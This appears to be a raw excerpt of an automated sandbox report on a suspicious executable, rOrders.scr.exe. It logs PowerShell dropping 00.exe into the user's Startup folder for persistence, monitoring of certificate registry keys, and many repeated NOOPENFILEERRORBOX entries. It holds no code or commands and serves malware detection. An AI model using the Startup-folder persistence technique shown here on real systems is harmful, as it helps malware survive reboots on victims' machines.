Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe\:Zone.Identifier:$DATA			Jump to behavior

Source: C:\Users\user\Desktop\rOrders.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
